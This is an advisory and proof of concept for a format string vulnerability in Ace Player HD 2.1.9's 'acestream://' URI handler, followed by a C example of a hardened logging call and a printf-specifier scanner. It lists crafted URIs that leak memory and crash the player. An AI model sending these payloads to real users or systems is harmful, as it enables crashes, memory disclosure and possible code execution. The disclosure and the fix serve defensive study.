ACE Stream Media 2.1 - 'acestream://' Format String

EDB-ID: 30666
CVE: N/A
Author: LiquidWorm
Type: local
Platform: Multiple
Date: 2014-01-03


ACE Stream Media 2.1 (acestream://) Format String Exploit PoC


Vendor: ACE Stream
Product web page: http://www.acestream.org
Affected version: Ace Player HD 2.1.9 (VLC 2.0.5)

Summary: Ace Stream is an innovative multimedia platform of a new
generation, which includes different products and solutions for
ordinary Internet users as well as for professional members of the
multimedia market. At its core, Ace Stream uses P2P (peer-to-peer)
technology and the BitTorrent protocol, which is acknowledged as the
most effective protocol to transfer/deliver 'heavy content'.

Desc: ACE Stream Media (Ace Player HD) is prone to a remote format
string vulnerability because the application fails to properly
sanitize user-supplied input passed through the URI using the
'acestream://' protocol before including it in the format-specifier
argument of a formatted-printing function. A remote attacker may exploit
this issue to execute arbitrary code with the privileges of the user
running the affected application and/or cause memory address disclosure.
Failed exploit attempts may cause denial-of-service (DoS) conditions.


Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5165
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php


30.12.2013

--


format md:

acestream://AAAA%08x.%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08pAAAAA
acestream://AAAA%s
acestream://AAAA%s.AAAA%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08d
acestream://%i%i%i%i
acestream://%c%c%c%c
acestream://%f%f%f%f
acestream://AAAA%.8x.%.8p.%.8i.%.8d.%.8f.%.8s.%n.%08x.%08x.%08x.%08x.%08x.%08xAAAA
acestream://%15.10s.%15.10s
acestream://%8x%8x%8x%8x%8x%8x%8x%8x%8x
acestream://%0a%0d
acestream://%AA
acestream://%p%p%p%p%s

crashes:

acestream://AAAA%08s
acestream://AAAA%n
acestream://%08s
acestream://%p%p%p%p%s%n
acestream://%n
acestream://%s%s%s%s
acestream://AAAA%15.10s.%15.10s.%15.10s.%15.10s.%15.10s.%15.10sAAAA
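
The flaw class from the Desc paragraph, seen from the fix side, as an added example (not code from Ace Player HD or from the advisory author): a logging call that uses a constant format, plus a scanner that counts printf conversions in a URI for triage. The function names are hypothetical. The scanner also shows why strings such as `%0a%0d` and `%AA` behave like the others: URL percent-escapes parse as printf conversions too, so filtering alone cannot replace the constant format.

```c
#include <stdio.h>
#include <string.h>

/* Scan s the way printf would: return the number of conversion
 * specifications and set *writes if any is %n (the conversion that writes
 * to memory). "%%" is a literal percent sign and is not counted. */
int scan_format_specs(const char *s, int *writes)
{
    int count = 0;
    *writes = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')
            continue;
        p += strspn(p, "-+ #0");                   /* flags */
        p += strspn(p, "0123456789*");             /* field width */
        if (*p == '.')
            p += 1 + strspn(p + 1, "0123456789*"); /* precision */
        p += strspn(p, "hlLqjzt");                 /* length modifiers */
        if (*p == '\0')
            break;
        if (strchr("diouxXeEfFgGaAcspn", *p)) {
            count++;
            if (*p == 'n')
                *writes = 1;
        } else {
            p--; /* not a conversion: let the loop re-examine this byte */
        }
    }
    return count;
}

/* Hardened logging call (hypothetical name): the URI is an argument to a
 * constant format. The flaw the advisory describes corresponds to
 * snprintf(out, n, uri), where the URI is the format string itself. */
int log_uri_safe(char *out, size_t n, const char *uri)
{
    return snprintf(out, n, "opening %s", uri);
}

int main(void)
{
    const char *uri = "acestream://%0a%0d"; /* test string from the advisory */
    char line[128];
    int writes, specs = scan_format_specs(uri, &writes);
    log_uri_safe(line, sizeof line, uri);
    printf("%s -> %d conversion(s), %%n present: %d\n", line, specs, writes);
    return 0;
}
```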